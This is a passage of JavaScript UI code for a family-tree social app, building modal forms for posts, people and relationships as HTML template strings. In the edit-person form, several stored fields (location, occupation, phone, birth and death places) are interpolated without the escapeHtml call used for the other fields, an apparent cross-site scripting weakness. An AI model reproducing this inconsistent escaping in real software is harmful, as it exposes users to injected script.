                    <div class="w-full max-w-lg mx-auto my-8 p-4 md:p-8 space-y-4 md:space-y-6 rounded-lg shadow-xl bg-surface transform translate-y-10 transition-transform duration-300 max-h-screen overflow-y-auto">
                        <h2 class="text-2xl font-bold">Share a Story</h2>
                        <form id="create-post-form" class="space-y-4">
                            <div>
                                <div class="flex items-center justify-between mb-1">
                                    <label for="post-content" class="text-sm font-medium text-gray-700">What's on your mind?</label>
                                    <button type="button" onclick="showEmojiPickerForInput('post-content', this)"
                                        class="px-2 py-1 text-lg border border-gray-300 rounded-md hover:bg-gray-100 transition-colors relative"
                                        title="Add emoji">
                                        😀
                                    </button>
                                </div>
                                <textarea id="post-content" rows="4" required placeholder="Share a memory, story, or update with your family..." class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary"></textarea>
                            </div>
                            <div>
                                <label class="text-sm font-medium text-gray-700">Add Media (optional)</label>
                                <div class="mt-2">
                                    <input type="file" id="post-media" accept="image/*,video/mp4,video/quicktime,video/webm,video/x-msvideo,video/avi" multiple onchange="handleMixedMediaPreview(event)" class="w-full px-3 py-2 text-sm border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                    <p class="text-xs text-gray-500 mt-1">📸 Photos & 🎥 Videos • Up to 10 items • Videos: Max 100MB each</p>

                                    <!-- Mixed Media Preview -->
                                    <div id="media-preview-container" class="hidden mt-3">
                                        <div id="media-preview-grid" class="grid grid-cols-1 sm:grid-cols-3 gap-2"></div>
                                        <div class="flex items-center gap-3 mt-2">
                                            <button type="button" onclick="clearAllMedia()" class="text-sm text-red-600 hover:text-red-800">Remove All Media</button>
                                            ${FEATURES.captionSuggestions ? `
                                            <button type="button" id="suggest-caption-btn" onclick="suggestAICaption()" class="text-sm text-purple-600 hover:text-purple-800 flex items-center gap-1">
                                                ${tablerIcon('wand', { size: 16, preserveColor: true })}
                                                Suggest Caption
                                            </button>
                                            ` : ''}
                                        </div>
                                        <div id="caption-suggestions" class="hidden mt-2"></div>
                                    </div>

                                    <!-- Upload Progress -->
                                    <div id="media-upload-progress" class="hidden mt-3">
                                        <div class="w-full bg-gray-200 rounded-full h-2">
                                            <div id="media-progress-bar" class="bg-primary h-2 rounded-full transition-all duration-300" style="width: 0%"></div>
                                        </div>
                                        <p class="text-xs text-gray-500 mt-1 text-center">⏳ Uploading media... Please wait</p>
                                    </div>
                                </div>
                            </div>
                            <div>
                                <label for="post-privacy" class="text-sm font-medium text-gray-700">Privacy</label>
                                <select id="post-privacy" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                    <option value="family">Family Only</option>
                                    <option value="public">Public (EBIWAWA Community)</option>
                                    <option value="private">Only Me</option>
                                </select>
                                <p class="text-xs text-gray-500 mt-1">Choose who can see this post</p>
                            </div>
                            <div>
                                <label for="post-comment-permission" class="text-sm font-medium text-gray-700">Who can comment?</label>
                                <select id="post-comment-permission" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                    <option value="everyone">Everyone</option>
                                    <option value="family">Family Only</option>
                                    <option value="none">No One (Disable Comments)</option>
                                </select>
                                <p class="text-xs text-gray-500 mt-1">Control who can comment on this post</p>
                            </div>
                            <div id="create-post-error" class="text-sm text-center text-error"></div>
                            <div class="flex justify-end pt-4 space-x-4">
                                <button type="button" onclick="closeModal('create-post-modal')" class="px-4 py-2 font-semibold text-gray-700 bg-gray-200 rounded-md hover:bg-gray-300">Cancel</button>
                                <button type="submit" class="btn btn-primary">Post</button>
                            </div>
                        </form>
                    </div>
                </div>
            `;
        }

        function EditPostModal(post) {
            return `
                <div id="edit-post-modal" class="modal-overlay fixed inset-0 z-50 flex items-start md:items-center justify-center p-4 bg-black bg-opacity-50 opacity-0 transition-opacity duration-300 pointer-events-none overflow-y-auto overflow-x-hidden">
                    <div class="w-full max-w-lg mx-auto my-8 p-4 md:p-8 space-y-4 md:space-y-6 rounded-lg shadow-xl bg-white transform translate-y-10 transition-transform duration-300 max-h-screen overflow-y-auto">
                        <h2 class="text-2xl font-bold">Edit Post</h2>
                        <form id="edit-post-form" class="space-y-4" onsubmit="handleEditPost(event, ${post.id}); return false;">
                            <div>
                                <div class="flex items-center justify-between mb-1">
                                    <label for="edit-post-content" class="text-sm font-medium text-gray-700">Content</label>
                                    <button type="button" onclick="showEmojiPickerForInput('edit-post-content', this)"
                                        class="px-2 py-1 text-lg border border-gray-300 rounded-md hover:bg-gray-100 transition-colors relative"
                                        title="Add emoji">
                                        😀
                                    </button>
                                </div>
                                <textarea id="edit-post-content" rows="4" required placeholder="What's on your mind?" class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">${escapeHtml(post.content || '')}</textarea>
                            </div>
                            <div>
                                <label for="edit-post-privacy" class="text-sm font-medium text-gray-700">Privacy</label>
                                <select id="edit-post-privacy" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                    <option value="family" ${post.privacy === 'family' ? 'selected' : ''}>Family Only</option>
                                    <option value="public" ${post.privacy === 'public' ? 'selected' : ''}>Public (EBIWAWA Community)</option>
                                    <option value="private" ${post.privacy === 'private' ? 'selected' : ''}>Only Me</option>
                                </select>
                            </div>
                            <div>
                                <label for="edit-post-comment-permission" class="text-sm font-medium text-gray-700">Who can comment?</label>
                                <select id="edit-post-comment-permission" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                    <option value="everyone" ${(post.commentPermission === 'everyone' || !post.commentPermission) ? 'selected' : ''}>Everyone</option>
                                    <option value="family" ${post.commentPermission === 'family' ? 'selected' : ''}>Family Only</option>
                                    <option value="none" ${post.commentPermission === 'none' ? 'selected' : ''}>No One (Disable Comments)</option>
                                </select>
                            </div>
                            <div id="edit-post-error" class="text-sm text-center text-error hidden"></div>
                            <div class="flex justify-end pt-4 space-x-4">
                                <button type="button" onclick="closeModal('edit-post-modal')" class="px-4 py-2 font-semibold text-gray-700 bg-gray-200 rounded-md hover:bg-gray-300">Cancel</button>
                                <button type="submit" class="btn btn-primary">Save Changes</button>
                            </div>
                        </form>
                    </div>
                </div>
            `;
        }

        function AddPersonModal() {
            // 20 form fields — content ~800-900px on desktop, exceeds
            // most viewports. Same 3-slot restructure as EditProfileModal
            // (2026-07-17): pinned header + scroll body + pinned footer.
            // See CLAUDE.md session log entry for the compositor-flash
            // mitigation ladder (overscroll-contain + bg-surface +
            // will-change-scroll on the scroll wrapper).
            return `
                <div id="add-person-modal" class="modal-overlay fixed inset-0 z-50 flex items-start md:items-center justify-center p-4 bg-black bg-opacity-50 opacity-0 transition-opacity duration-300 pointer-events-none overflow-y-auto overflow-x-hidden">
                    <div class="w-full max-w-2xl flex flex-col rounded-lg shadow-xl bg-surface transform translate-y-10 transition-transform duration-300" style="max-height: calc(var(--vh, 100vh) - 2rem);">
                        <div class="flex items-start justify-between px-8 pt-8 pb-4 flex-shrink-0 border-b border-gray-200">
                            <div>
                                <h2 class="text-2xl font-bold">Add Family Member</h2>
                                <!-- Phase 1: subhead clarifies + Person vs. Invite (which sends an invite to someone already on Ebiwawa or about to be). -->
                                <p class="text-sm text-gray-600 mt-1">Add someone who isn't on Ebiwawa yet</p>
                            </div>
                            <button type="button" onclick="closeModal('add-person-modal')" class="text-gray-400 hover:text-gray-600 transition-colors">
                                ${tablerIcon('x', { size: 24, preserveColor: true })}
                            </button>
                        </div>
                        <form id="add-person-form" class="flex-1 flex flex-col min-h-0" onsubmit="handleAddPerson(event); return false;">
                            <div class="flex-1 overflow-y-auto overscroll-contain px-8 py-6 space-y-4 bg-surface will-change-scroll">
                            <!-- 2026-09-12: photo picker for off-platform Persons. Uploaded via
                                 POST /trees/<id>/person/<id>/photo after the Person is created. -->
                            <div class="flex items-center gap-4">
                                <div id="person-photo-preview" class="w-20 h-20 rounded-full bg-gray-100 flex items-center justify-center overflow-hidden border border-gray-200 flex-shrink-0">
                                    ${tablerIcon('user-circle', { size: 40, preserveColor: true, className: 'text-gray-400' })}
                                </div>
                                <div class="flex-1 min-w-0">
                                    <label class="block text-sm font-medium text-gray-700">Profile photo (optional)</label>
                                    <input id="person-photo-input" type="file" accept="image/*" class="hidden" onchange="handlePersonPhotoPreview(event, 'person-photo-preview', 'person-photo-clear-btn')">
                                    <div class="flex items-center gap-3 mt-1 flex-wrap">
                                        <button type="button" onclick="ebwOpenPhotoPicker('person-photo-input')" class="text-sm text-primary hover:underline">Choose file</button>
                                        <span class="text-xs text-gray-400">or</span>
                                        <button type="button" onclick="togglePersonAvatarPicker('person-avatar-picker')" class="text-sm text-primary hover:underline">Pick an avatar</button>
                                        <button type="button" id="person-photo-clear-btn" class="hidden text-sm text-gray-500 hover:underline" onclick="clearPersonPhotoInput('person-photo-input', 'person-photo-preview', 'person-photo-clear-btn')">Remove</button>
                                    </div>
                                    <p class="text-xs text-gray-500 mt-1">JPG/PNG/WebP up to 5MB</p>
                                </div>
                            </div>
                            <div id="person-avatar-picker" class="hidden">
                                ${renderPersonAvatarPickerTiles('person')}
                            </div>
                            <div class="grid grid-cols-1 sm:grid-cols-2 gap-4">
                                <div>
                                    <label for="person-first-name" class="text-sm font-medium text-gray-700">First Name</label>
                                    <input id="person-first-name" type="text" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                </div>
                                <div>
                                    <label for="person-last-name" class="text-sm font-medium text-gray-700">Last Name</label>
                                    <input id="person-last-name" type="text" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                </div>
                            </div>
                            <p class="text-xs text-gray-500 -mt-2">* At least one name is required</p>
                            <div>
                                <label for="person-suffix" class="text-sm font-medium text-gray-700">Suffix (Optional)</label>
                                <select id="person-suffix" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                    <option value="">None</option>
                                    <option value="Jr.">Jr.</option>
                                    <option value="Sr.">Sr.</option>
                                    <option value="II">II</option>
                                    <option value="III">III</option>
                                    <option value="IV">IV</option>
                                    <option value="V">V</option>
                                </select>
                            </div>
                            <div>
                                <label for="person-gender" class="text-sm font-medium text-gray-700">Gender</label>
                                <select id="person-gender" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                    <option value="">Select gender</option>
                                    <option value="male">Male</option>
                                    <option value="female">Female</option>
                                </select>
                            </div>
                            <div class="grid grid-cols-1 sm:grid-cols-3 gap-4">
                                <div>
                                    <label for="person-birth-year" class="text-sm font-medium text-gray-700">Birth Year</label>
                                    <input id="person-birth-year" type="number" placeholder="YYYY" min="1800" max="${new Date().getFullYear()}" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                </div>
                                <div>
                                    <label for="person-birth-month" class="text-sm font-medium text-gray-700">Birth Month</label>
                                    <input id="person-birth-month" type="number" min="1" max="12" placeholder="MM" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                </div>
                                <div>
                                    <label for="person-birth-day" class="text-sm font-medium text-gray-700">Birth Day</label>
                                    <input id="person-birth-day" type="number" min="1" max="31" placeholder="DD" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                </div>
                            </div>
                            <div>
                                <label class="text-sm font-medium text-gray-700">Birth Place</label>
                                <div class="grid grid-cols-1 sm:grid-cols-3 gap-2 mt-1">
                                    <div>
                                        <label for="person-birth-city" class="text-xs text-gray-500">City</label>
                                        <input id="person-birth-city" type="text" class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                    </div>
                                    <div>
                                        <label for="person-birth-state" class="text-xs text-gray-500">State / Province / Region</label>
                                        <input id="person-birth-state" type="text" class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                    </div>
                                    <div>
                                        <label for="person-birth-country" class="text-xs text-gray-500">Country</label>
                                        <input id="person-birth-country" type="text" class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                    </div>
                                </div>
                            </div>
                            <div>
                                <label for="person-current-location" class="text-sm font-medium text-gray-700">Current Location</label>
                                <input id="person-current-location" type="text" placeholder="City, Region, Country" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                            </div>
                            <div>
                                <label for="person-occupation" class="text-sm font-medium text-gray-700">Occupation</label>
                                <input id="person-occupation" type="text" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                            </div>
                            <div>
                                <label class="flex items-center space-x-2">
                                    <input id="person-is-alive" type="checkbox" checked onchange="toggleDeathFields()" class="w-4 h-4 text-primary border-gray-300 rounded focus:ring-primary">
                                    <span class="text-sm font-medium text-gray-700">Currently alive</span>
                                </label>
                            </div>
                            <div id="death-fields" class="hidden space-y-4">
                                <div class="grid grid-cols-1 sm:grid-cols-3 gap-4">
                                    <div>
                                        <label for="person-death-year" class="text-sm font-medium text-gray-700">Death Year</label>
                                        <input id="person-death-year" type="number" placeholder="YYYY" min="1800" max="${new Date().getFullYear()}" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                    </div>
                                    <div>
                                        <label for="person-death-month" class="text-sm font-medium text-gray-700">Death Month</label>
                                        <input id="person-death-month" type="number" min="1" max="12" placeholder="MM" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                    </div>
                                    <div>
                                        <label for="person-death-day" class="text-sm font-medium text-gray-700">Death Day</label>
                                        <input id="person-death-day" type="number" min="1" max="31" placeholder="DD" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                    </div>
                                </div>
                                <div>
                                    <label for="person-death-place" class="text-sm font-medium text-gray-700">Death Place</label>
                                    <input id="person-death-place" type="text" placeholder="City, Region, Country" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                </div>
                            </div>
                            <hr class="my-4">
                            <h3 class="text-lg font-semibold text-gray-800">Contact Information</h3>
                            <div class="grid grid-cols-1 sm:grid-cols-2 gap-4">
                                <div>
                                    <label for="person-email" class="text-sm font-medium text-gray-700">Email</label>
                                    <input id="person-email" type="email" placeholder="email@example.com" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                </div>
                                <div>
                                    <label for="person-phone" class="text-sm font-medium text-gray-700">Phone</label>
                                    <input id="person-phone" type="tel" placeholder="+1 (555) 123-4567" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                </div>
                            </div>
                            <div>
                                <label for="person-bio" class="text-sm font-medium text-gray-700">Biography / Notes</label>
                                <textarea id="person-bio" rows="4" placeholder="Add any additional information about this person..." class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary"></textarea>
                            </div>
                            <div id="add-person-error" class="text-sm text-center text-error"></div>
                            </div>
                            <div class="flex justify-end gap-4 px-8 py-4 border-t border-gray-200 flex-shrink-0 bg-surface rounded-b-lg">
                                <button type="button" onclick="closeModal('add-person-modal')" class="px-4 py-2 font-semibold text-gray-700 bg-gray-200 rounded-md hover:bg-gray-300">Cancel</button>
                                <button type="submit" class="btn btn-primary">Add Person</button>
                            </div>
                        </form>
                    </div>
                </div>
            `;
        }

        function EditPersonModal(person) {
            // 20 form fields — same 3-slot restructure as AddPersonModal
            // and EditProfileModal. See CLAUDE.md 2026-07-17 session log
            // for the pattern rationale.
            return `
                <div id="edit-person-modal" class="modal-overlay fixed inset-0 z-50 flex items-start md:items-center justify-center p-4 bg-black bg-opacity-50 opacity-0 transition-opacity duration-300 pointer-events-none overflow-y-auto overflow-x-hidden">
                    <div class="w-full max-w-2xl flex flex-col rounded-lg shadow-xl bg-surface transform translate-y-10 transition-transform duration-300" style="max-height: calc(var(--vh, 100vh) - 2rem);">
                        <div class="flex items-center justify-between px-8 pt-8 pb-4 flex-shrink-0 border-b border-gray-200">
                            <h2 class="text-2xl font-bold">Edit ${escapeHtml(person.first_name)} ${escapeHtml(person.last_name)}</h2>
                            <button type="button" onclick="closeModal('edit-person-modal')" class="text-gray-400 hover:text-gray-600 transition-colors">
                                ${tablerIcon('x', { size: 24, preserveColor: true })}
                            </button>
                        </div>
                        <form id="edit-person-form" class="flex-1 flex flex-col min-h-0" data-person-id="${person.id}" data-existing-photo="${person.profile_photo_url ? '1' : ''}">
                            <div class="flex-1 overflow-y-auto overscroll-contain px-8 py-6 space-y-4 bg-surface will-change-scroll">
                            <!-- 2026-09-12: photo picker for off-platform Persons. If a new file is
                                 chosen, POSTed to /photo after PUT succeeds. If the existing photo is
                                 removed, DELETE /photo fires. See handleEditPerson. -->
                            <div class="flex items-center gap-4">
                                <div id="edit-person-photo-preview" class="w-20 h-20 rounded-full bg-gray-100 flex items-center justify-center overflow-hidden border border-gray-200 flex-shrink-0">
                                    ${person.profile_photo_url
                                        ? `<img src="${escapeHtml(person.profile_photo_url)}" class="w-full h-full object-cover" alt="Current photo">`
                                        : tablerIcon('user-circle', { size: 40, preserveColor: true, className: 'text-gray-400' })}
                                </div>
                                <div class="flex-1 min-w-0">
                                    <label class="block text-sm font-medium text-gray-700">Profile photo</label>
                                    <input id="edit-person-photo-input" type="file" accept="image/*" class="hidden" onchange="handlePersonPhotoPreview(event, 'edit-person-photo-preview', 'edit-person-photo-clear-btn')">
                                    <div class="flex items-center gap-3 mt-1 flex-wrap">
                                        <button type="button" onclick="ebwOpenPhotoPicker('edit-person-photo-input')" class="text-sm text-primary hover:underline">${person.profile_photo_url ? 'Change' : 'Choose file'}</button>
                                        <span class="text-xs text-gray-400">or</span>
                                        <button type="button" onclick="togglePersonAvatarPicker('edit-person-avatar-picker')" class="text-sm text-primary hover:underline">Pick an avatar</button>
                                        <button type="button" id="edit-person-photo-clear-btn" class="${person.profile_photo_url ? '' : 'hidden'} text-sm text-gray-500 hover:underline" onclick="clearPersonPhotoInput('edit-person-photo-input', 'edit-person-photo-preview', 'edit-person-photo-clear-btn', true)">Remove</button>
                                    </div>
                                    <p class="text-xs text-gray-500 mt-1">JPG/PNG/WebP up to 5MB</p>
                                </div>
                            </div>
                            <div id="edit-person-avatar-picker" class="hidden">
                                ${renderPersonAvatarPickerTiles('edit-person')}
                            </div>
                            <div class="grid grid-cols-1 sm:grid-cols-2 gap-4">
                                <div>
                                    <label for="edit-person-first-name" class="text-sm font-medium text-gray-700">First Name</label>
                                    <input id="edit-person-first-name" type="text" value="${escapeHtml(person.first_name)}" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                </div>
                                <div>
                                    <label for="edit-person-last-name" class="text-sm font-medium text-gray-700">Last Name</label>
                                    <input id="edit-person-last-name" type="text" value="${escapeHtml(person.last_name)}" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                </div>
                            </div>
                            <p class="text-xs text-gray-500 -mt-2">* At least one name is required</p>
                            <div>
                                <label for="edit-person-suffix" class="text-sm font-medium text-gray-700">Suffix (Optional)</label>
                                <select id="edit-person-suffix" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                    <option value="">None</option>
                                    <option value="Jr." ${person.suffix === 'Jr.' ? 'selected' : ''}>Jr.</option>
                                    <option value="Sr." ${person.suffix === 'Sr.' ? 'selected' : ''}>Sr.</option>
                                    <option value="II" ${person.suffix === 'II' ? 'selected' : ''}>II</option>
                                    <option value="III" ${person.suffix === 'III' ? 'selected' : ''}>III</option>
                                    <option value="IV" ${person.suffix === 'IV' ? 'selected' : ''}>IV</option>
                                    <option value="V" ${person.suffix === 'V' ? 'selected' : ''}>V</option>
                                </select>
                            </div>
                            <div>
                                <label for="edit-person-gender" class="text-sm font-medium text-gray-700">Gender</label>
                                <select id="edit-person-gender" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                    <option value="">Select gender</option>
                                    <option value="male" ${person.gender === 'male' ? 'selected' : ''}>Male</option>
                                    <option value="female" ${person.gender === 'female' ? 'selected' : ''}>Female</option>
                                </select>
                            </div>
                            <div class="grid grid-cols-1 sm:grid-cols-3 gap-4">
                                <div>
                                    <label for="edit-person-birth-year" class="text-sm font-medium text-gray-700">Birth Year</label>
                                    <input id="edit-person-birth-year" type="number" placeholder="YYYY" min="1800" max="${new Date().getFullYear()}" value="${person.birth_year || ''}" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                </div>
                                <div>
                                    <label for="edit-person-birth-month" class="text-sm font-medium text-gray-700">Birth Month</label>
                                    <input id="edit-person-birth-month" type="number" min="1" max="12" value="${person.birth_month || ''}" placeholder="MM" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                </div>
                                <div>
                                    <label for="edit-person-birth-day" class="text-sm font-medium text-gray-700">Birth Day</label>
                                    <input id="edit-person-birth-day" type="number" min="1" max="31" value="${person.birth_day || ''}" placeholder="DD" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                </div>
                            </div>
                            <div>
                                <label class="text-sm font-medium text-gray-700">Birth Place</label>
                                <div class="grid grid-cols-1 sm:grid-cols-3 gap-2 mt-1">
                                    <div>
                                        <label for="edit-person-birth-city" class="text-xs text-gray-500">City</label>
                                        <input id="edit-person-birth-city" type="text" value="${person.birth_city || ''}" class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                    </div>
                                    <div>
                                        <label for="edit-person-birth-state" class="text-xs text-gray-500">State / Province / Region</label>
                                        <input id="edit-person-birth-state" type="text" value="${person.birth_state || ''}" class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                    </div>
                                    <div>
                                        <label for="edit-person-birth-country" class="text-xs text-gray-500">Country</label>
                                        <input id="edit-person-birth-country" type="text" value="${person.birth_country || ''}" class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                    </div>
                                </div>
                            </div>
                            <div>
                                <label for="edit-person-current-location" class="text-sm font-medium text-gray-700">Current Location</label>
                                <input id="edit-person-current-location" type="text" value="${person.current_location || ''}" placeholder="City, Region, Country" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                            </div>
                            <div>
                                <label for="edit-person-occupation" class="text-sm font-medium text-gray-700">Occupation</label>
                                <input id="edit-person-occupation" type="text" value="${person.occupation || ''}" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                            </div>
                            <div>
                                <label class="flex items-center space-x-2">
                                    <input id="edit-person-is-alive" type="checkbox" ${person.is_alive !== false ? 'checked' : ''} onchange="toggleEditDeathFields()" class="w-4 h-4 text-primary border-gray-300 rounded focus:ring-primary">
                                    <span class="text-sm font-medium text-gray-700">Currently alive</span>
                                </label>
                            </div>

                            <!-- Death Information (shown when not alive) -->
                            <div id="edit-death-fields" class="${person.is_alive !== false ? 'hidden' : ''} space-y-4">
                                <hr class="my-4">
                                <h3 class="text-lg font-semibold text-gray-800">Death Information</h3>
                                <div class="grid grid-cols-1 sm:grid-cols-3 gap-4">
                                    <div>
                                        <label for="edit-person-death-year" class="text-sm font-medium text-gray-700">Death Year</label>
                                        <input id="edit-person-death-year" type="number" placeholder="YYYY" min="1800" max="${new Date().getFullYear()}" value="${person.death_year || ''}" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                    </div>
                                    <div>
                                        <label for="edit-person-death-month" class="text-sm font-medium text-gray-700">Death Month</label>
                                        <input id="edit-person-death-month" type="number" min="1" max="12" value="${person.death_month || ''}" placeholder="MM" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                    </div>
                                    <div>
                                        <label for="edit-person-death-day" class="text-sm font-medium text-gray-700">Death Day</label>
                                        <input id="edit-person-death-day" type="number" min="1" max="31" value="${person.death_day || ''}" placeholder="DD" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                    </div>
                                </div>
                                <div>
                                    <label for="edit-person-death-place" class="text-sm font-medium text-gray-700">Death Place</label>
                                    <input id="edit-person-death-place" type="text" value="${person.death_place || ''}" placeholder="City, Region, Country" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                </div>
                            </div>

                            <!-- Contact Information -->
                            <hr class="my-4">
                            <h3 class="text-lg font-semibold text-gray-800">Contact Information</h3>
                            <div class="grid grid-cols-1 sm:grid-cols-2 gap-4">
                                <div>
                                    <label for="edit-person-email" class="text-sm font-medium text-gray-700">Email</label>
                                    <input id="edit-person-email" type="email" value="${escapeHtml(person.email)}" placeholder="email@example.com" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                </div>
                                <div>
                                    <label for="edit-person-phone" class="text-sm font-medium text-gray-700">Phone</label>
                                    <input id="edit-person-phone" type="tel" value="${person.phone || ''}" placeholder="+1 (555) 123-4567" class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                </div>
                            </div>

                            <!-- Biography / Notes -->
                            <div>
                                <label for="edit-person-bio" class="text-sm font-medium text-gray-700">Biography / Notes</label>
                                <textarea id="edit-person-bio" rows="4" placeholder="Add any additional information about this person..." class="w-full px-3 py-2 mt-1 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">${escapeHtml(person.bio)}</textarea>
                            </div>

                            <div id="edit-person-error" class="text-sm text-center text-error"></div>
                            </div>
                            <div class="flex justify-between items-center gap-4 px-8 py-4 border-t border-gray-200 flex-shrink-0 bg-surface rounded-b-lg">
                                <!-- 2026-09-12: Delete Person moved into the Edit modal footer per the
                                     Phase 1 design intent ("delete via person-detail / edit modal path").
                                     deletePersonFromEdit() reads personId + current name from the form's
                                     dataset + inputs — sidesteps the "O'Brien" apostrophe escape trap
                                     from inline onclick string interpolation. -->
                                <button type="button" onclick="deletePersonFromEdit()" class="text-sm font-medium text-red-600 hover:text-red-700 hover:underline">Delete Person</button>
                                <div class="flex gap-4">
                                    <button type="button" onclick="closeModal('edit-person-modal')" class="px-4 py-2 font-semibold text-gray-700 bg-gray-200 rounded-md hover:bg-gray-300">Cancel</button>
                                    <button type="submit" class="btn btn-primary">Save Changes</button>
                                </div>
                            </div>
                        </form>
                    </div>
                </div>
            `;
        }

        function AddRelationshipModal() {
            return `
                <div id="add-relationship-modal" class="modal-overlay fixed inset-0 z-50 flex items-start md:items-center justify-center p-4 bg-black bg-opacity-50 opacity-0 transition-opacity duration-300 pointer-events-none overflow-y-auto overflow-x-hidden">
                    <div class="bg-white rounded-lg shadow-lg p-6 max-w-lg w-full mx-4 transform translate-y-10 transition-transform duration-300">
                        <div class="flex items-center justify-between mb-4">
                            <h2 class="text-2xl font-bold">Add Relationship</h2>
                            <button type="button" onclick="closeModal('add-relationship-modal')" class="text-gray-400 hover:text-gray-600 transition-colors">
                                ${tablerIcon('x', { size: 24, preserveColor: true })}
                            </button>
                        </div>
                        <form id="add-relationship-form" class="space-y-4">
                            <div id="add-relationship-error" class="text-sm text-center text-error hidden"></div>

                            <p class="text-sm text-gray-600 bg-gray-50 p-3 rounded">
                                Read the sentence left-to-right: <strong>Person A is the [relationship] of Person B</strong>.
                                For example, to record that Alice is Bob's daughter, set <strong>Person A = Alice</strong>,
                                <strong>relationship = child</strong>, <strong>Person B = Bob</strong>.
                            </p>

                            <div>
                                <label for="relationship-from-person" class="block text-sm font-medium text-gray-700 mb-1">Person A</label>
                                <select id="relationship-from-person" required class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                    <option value="">Select person...</option>
                                </select>
                            </div>

                            <div>
                                <label for="relationship-type" class="block text-sm font-medium text-gray-700 mb-1">is the…</label>
                                <select id="relationship-type" required onchange="toggleMarriageYearField()" class="w-full px-3 py-2 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-primary">
                                    <option value="">Select relationship...</option>
                                    <option value="CHILD_OF">child of</option>
                                    <option value="SPOUSE_OF">spouse of</option>
                                    <option value="SIBLING_OF">sibling of</option>
                                    <option value="COUSIN_OF">cousin of</option>
                                    <option value="AUNT_UNCLE_OF">aunt or uncle of</option>
                                    <option value="NIECE_NEPHEW_OF">niece or nephew of</option>
                                    <option value="GRANDPARENT_OF">grandparent of</option>
                                    <option value="GRANDCHILD_OF">grandchild of</option>
                                </select>
